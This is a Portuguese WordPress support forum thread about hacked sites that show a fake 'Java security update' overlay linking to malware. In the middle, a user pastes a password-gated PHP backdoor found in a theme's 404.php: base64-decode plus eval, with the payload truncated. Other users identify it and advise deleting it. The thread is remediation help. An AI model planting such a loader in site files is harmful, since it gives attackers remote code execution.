• Resolvido tcpengenhariacivil

    (@tcpengenhariacivil)


    Boa tarde.

    Hoje cedo tentei acessar o meu site e recebi uma mensagem de ‘Atualização obrigatória de segurança do Java’. Essa mensagem ocupa boa parte da tela e impossibilita a navegação no site. Estou certo de que é algum tipo de vírus, no entanto, não está relacionado à minha máquina, uma vez que várias pessoas em outros servidores estão apresentando o mesmo problema.

    Obs.: já atualizei o WP, reiniciei o note, reiniciei a rede, tentei entrar por navegação anônima, limpei o cache do navegador, passei antivírus, mas nenhum sucesso.

    A mensagem é muito semelhante ao que está nessa página:
    https://www.java.com/pt_BR/security/

    e ainda fornece um link para baixar seja lá qual for o malware (suposta atualização do Java). Não encontrei nenhum problema parecido em minhas buscas. Se alguém tiver ideia de como posso resolver isso, ficaria muito agradecido!

    Site: http://tcpengenhariacivil.com.br/

    A página que eu preciso de ajuda: [fazer login para ver o link]

Visualizando 15 respostas - 1 até 15 (de um total de 18)
  • Moderador Felipe Elia

    (@felipeelia)

    Olá @tcpengenhariacivil,

    Acessei agora o site e pareceu tudo normal. Conseguiu resolver o problema? Se sim, não esqueça de voltar aqui e dizer como fez e marcar seu tópico como resolvido. Assim você ajuda outras pessoas que podem chegar por aqui com problemas parecidos.

    Criador do tópico tcpengenhariacivil

    (@tcpengenhariacivil)

    Boa tarde!

    Após criar este tópico, não tomei nenhuma atitude além das que mencionei acima, o problema simplesmente sumiu em questão de dias. Não sei o que pode ter acontecido, talvez um malware no servidor que tenha sido eliminado pelo próprio WordPress. De qualquer forma, agradeço pela atenção!

    Boa tarde!

    Ao acessar o seu site http:/www./tcpengenhariacivil.com.br/, ainda aparece a janela de solicitação do Java.
    No site aqui da empresa também aparece a mesma coisa. O endereço é o http://www.harasseteflechas.com.br/
    Sabem dizer se isso é algum tipo de vírus, ou é do Java mesmo?

    Estou com o mesmo problema, estou verificando neste momento se teve algum arquivo malicioso no ftp

    Bom dia!
    Alguma novidade?

    Moderador Felipe Elia

    (@felipeelia)

    Oi @tcpengenhariacivil,

    Acabei de tentar acessar o tcpengenhariacivil.com.br e fui redirecionado para outro site. Se você tem acesso ao painel do WordPress instale um plugin chamado WordFence e rode seu “scan”, muito provavelmente ele foi infectado.

    Além disso veja se você está com o WordPress, plugins e temas atualizados, troque sua senha de FTP e dos usuários administradores.

    Eu não consegui resolver o meu site ainda, mostra a mensagem da atualização do java, paguei todos arquivos que me pareceram estranhos, instalei o plugin sucuri, o wordfence e nada ainda de solução, estou procurando no banco algum vestigio

    Também estou com o mesmo problema no meu site. Rodei WordFence, antivírus da hospedagem, excluí plugins e nenhuma solução.

    Alguém tem alguma novidade?

    ACHEI A SOLUÇÃO !!!! UHU o código criptografado esta dentro do arquivo 404.php do seu tema. Eu usei o plugin “Anti-Malware Security and Brute-Force Firewall”

    Oi @haroldotiberio
    Usei o plugin que comentaste e não encontrei nada.

    Tem certeza de que o arquivo era esse?
    O meu site já está sem ele e o problema persiste. :/

    Sim, foi este plugin e meu diretorio e arquivo é esse: /www/wp-content/themes/oceanwp/404.php

    No meu 404.php, aparece tudo isso abaixo. Haroldo, o que você fez?

    <?php
    if (isset($_GET[‘page’]))
    {
    if (md5($_GET[‘page’]) == “b34204f1ffddcf3ad51e021794376b5a”)
    {
    $ec = “LyoqDQogKiBXU08gMg0KICogV2ViIFNoZ……(VÁRIOS PARÁGRAFOS DE CARACTERES)………………FsnYSddKTs=”;

    $ecd = base64_decode($ec);
    eval($ecd);

    die();
    }
    }
    ?>
    <?php
    /**
    * The template for displaying 404 pages (Not Found)
    *
    * @package WordPress
    * @subpackage Twenty_Fourteen
    * @since Twenty Fourteen 1.0
    */

    get_header(); ?>

    <div id=”primary” class=”content-area”>
    <div id=”content” class=”site-content” role=”main”>

    <header class=”page-header”>
    <h1 class=”page-title”><?php _e( ‘Not Found’, ‘twentyfourteen’ ); ?></h1>
    </header>

    <div class=”page-content”>
    <p><?php _e( ‘It looks like nothing was found at this location. Maybe try a search?’, ‘twentyfourteen’ ); ?></p>

    <?php get_search_form(); ?>
    </div><!– .page-content –>

    </div><!– #content –>
    </div><!– #primary –>

    <?php
    get_sidebar( ‘content’ );
    get_sidebar();
    get_footer();

    Ai esta o hack cara kkk!!!
    Apaga tudo isso:

    <?php
    if (isset($_GET[‘page’]))
    {
    if (md5($_GET[‘page’]) == “b34204f1ffddcf3ad51e021794376b5a”)
    {
    $ec = “LyoqDQogKiBXU08gMg0KICogV2ViIFNoZ……(VÁRIOS PARÁGRAFOS DE CARACTERES)………………FsnYSddKTs=”;

    $ecd = base64_decode($ec);
    eval($ecd);

    die();
    }
    }
    ?>

    Pessoal, voltou o problema, não sei mais o que fazer, não encontrei ainda onde ta essa m****…

    • Esta resposta foi modificada 6 anos, 8 meses atrás por Felipe Elia. Razão: retirado um palavrão

    Também esgotei todas as minhas alternativas e não consegui solucionar o problema.

    Já que esse tópico aparece como “resolvido”, abri um novo aqui: https://br.wordpress.org/support/topic/atualizacao-obrigatoria-de-seguranca-do-java/

Visualizando 15 respostas - 1 até 15 (de um total de 18)
  • O tópico ‘Mensagem: atualização obrigatória de segurança do Java.’ está fechado para novas respostas.